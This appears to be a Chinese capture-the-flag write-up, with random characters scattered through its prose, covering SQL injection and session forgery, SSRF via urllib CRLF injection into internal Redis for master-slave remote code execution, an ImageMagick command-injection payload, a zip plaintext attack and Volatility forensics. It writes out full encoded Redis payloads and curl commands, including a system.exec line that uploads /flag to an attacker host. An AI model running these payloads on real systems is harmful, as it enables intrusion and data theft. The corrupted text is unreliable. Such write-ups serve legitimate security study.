立志成為admin的男人
通過注冊橡淑,提示要admin
。
登陸處存在
sql
注入:用
sqlmap
注出管理員賬號:這里沒有權(quán)限讀取
index.php
咆爽,那肯定也沒有權(quán)限能寫webshell
:掃描可以得到一個
test.php
梁棠,里面打印當(dāng)前的用戶名:這里可以通過注入漏洞,往
/tmp
目錄下的session
文件中寫入斗埂,來偽造自己admin
的身份符糊。修改
session
,訪問index.php
就可以得到flag
:用Python寫的一個網(wǎng)站 好像還沒有寫完呛凶?
首頁有個ssrf
漏洞男娄,但是能通過http
協(xié)議訪問。
可以看一下請求頭把兔,是nginx
沪伙,并且網(wǎng)站是用python/3.6.5
寫的:
存在
nginx
目錄穿越漏洞,可以得到源碼:/static../main.py
python
的urllib
出現(xiàn)過頭注入县好,可以同來攻擊內(nèi)網(wǎng)ssrf
围橡,來測試一下:成功注入頭部,存在
urllib
頭注入漏洞缕贡。這里攻擊內(nèi)網(wǎng)
redis
翁授,用到了主從rce
,github
上有開源的腳本晾咪。先開啟惡意的
redis
服務(wù)器:然后設(shè)置
redis
的主服務(wù)器為惡意redis
服務(wù)收擦。
auth password123 //
*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a
SLAVEOF 192.168.21.1 7789 //
*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$12%0d%0a192.168.21.1%0d%0a$4%0d%0a7789%0d%0a
CONFIG SET dbfilename exp.so //
*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$6%0d%0aexp.so%0d%0a
發(fā)送數(shù)據(jù):
curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a%0d%0a*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$12%0d%0a192.168.21.1%0d%0a$4%0d%0a7789%0d%0a%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$6%0d%0aexp.so%0d%0a'
加載惡意模塊:
auth password123 //
*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a
MODULE LOAD ./exp.so //
*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD%0d%0a$8%0d%0a./exp.so%0d%0a
SLAVEOF NO ONE //
*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$2%0d%0aNO%0d%0a$3%0d%0aONE%0d%0a
發(fā)送數(shù)據(jù):
curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$4%0d%0aLOAD%0d%0a$8%0d%0a./exp.so%0d%0a%0d%0a*3%0d%0a$7%0d%0aSLAVEOF%0d%0a$2%0d%0aNO%0d%0a$3%0d%0aONE%0d%0a%0d%0a'`
然后執(zhí)行命令,因為無回顯谍倦,所以利用curl
命令把flag
文件傳輸出去:
auth password123 //
*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a
system.exec 'curl -F "file=@/flag"
http://192.168.21.1:7789' //
*2%0d%0a$11%0d%0asystem.exec%0d%0a$46%0d%0acurl%20-F%20%22file=@/flag%22%20http://192.168.21.1:7789%0d%0a
發(fā)送數(shù)據(jù):
curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a%0d%0a*2%0d%0a$11%0d%0asystem.exec%0d%0a$46%0d%0acurl%20-F%20%22file=@/flag%22%20http://192.168.21.1:7789%0d%0a'
最后刪除惡意模塊塞赂,關(guān)閉惡意模塊:
auth password123 //
*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a
CONFIG SET dbfilename dump.rdb //
*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$8%0d%0adump.rdb%0d%0a
system.exec 'rm ./exp.so' //
*2%0d%0a$11%0d%0asystem.exec%0d%0a$11%0d%0arm%20./exp.so%0d%0a
MODULE UNLOAD system //
*3%0d%0a$6%0d%0aMODULE%0d%0a$6%0d%0aUNLOAD%0d%0a$6%0d%0asystem%0d%0a
發(fā)送數(shù)據(jù):
curl http://127.0.0.1:8000/ -XPOST --data 'url=http://redis-server:6379/%0d%0a%0d%0a*2%0d%0a$4%0d%0aauth%0d%0a$11%0d%0apassword123%0d%0a*4%0d%0a$6%0d%0aCONFIG%0d%0a$3%0d%0aSET%0d%0a$10%0d%0adbfilename%0d%0a$8%0d%0adump.rdb%0d%0a%0d%0a*2%0d%0a$11%0d%0asystem.exec%0d%0a$11%0d%0arm%20./exp.so%0d%0a%0d%0a*3%0d%0a$6%0d%0aMODULE%0d%0a$6%0d%0aUNLOAD%0d%0a$6%0d%0asystem%0d%0a%0d%0a
真實的環(huán)境中,充滿了未知昼蛀,漏洞與函數(shù)的拼接宴猾,能否繞過?
打開叼旋,需要爆破得到賬號密碼admin/1qaz@WSX
仇哆。(吐槽:這TM誰爆得出來?)
登陸后有個上傳點夫植,源碼有串
base64
提示:這里就利用
imagemagick+getimagesize
來執(zhí)行代碼讹剔。參考鏈接payload
:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|"`id`)'
pop graphic-context
#define xlogo_width 200
#define xlogo_height 200
最后找下flag
。
注入真的好難!!!
分析數(shù)據(jù)包,可以看到一堆sql
盲注的流量延欠。
參照土司機的博客陌兑,可以提取出最后的
url:t.cn/Ai8PhqSb
和passwd:bkis
。得到一個加密的壓縮包由捎。
翻找流量包诀紊,可以看到一個
readme.7z
:看到兩個壓縮包都有
readme.txt
,所以是明文攻擊隅俘。把
readme.7z
解壓邻奠,再用7z
壓縮工具把readme.txt
壓縮成zip
形式的。解壓就可以得到最后的
flag
为居。google語法真不錯B笛纭!蒙畴!
給了一個系統(tǒng)鏡像贰镣,首先分析下版本:
$ volatility -f xp.raw imageinfo
架構(gòu)應(yīng)該是
WinXPSP2x86
。查看下進(jìn)程:
$ volatility -f xp.raw –profile=WinXPSP2x86 pslist
可以查看下桌面文件:
$ volatility -f xp.raw –profile=WinXPSP2x86 filescan | grep 桌面
有個
360.jpg
膳凝,提取一下:
$ volatility -f xp.raw –profile=WinXPSP2x86 dumpfiles -D ./ -Q 0x000000000215f340
再去查看下
ie
瀏覽器歷史:
$ volatility -f xp.raw –profile=WinXPSP2x86 iehistory
搜索下可以發(fā)現(xiàn)個
github
倉庫:看下提交記錄碑隆,提示了
F5
,那就是F5
隱寫了蹬音。解密:
$ java Extract 360.jpg -p 360CTFisSOeasy
得到out.txt
上煤,里面就是flag
。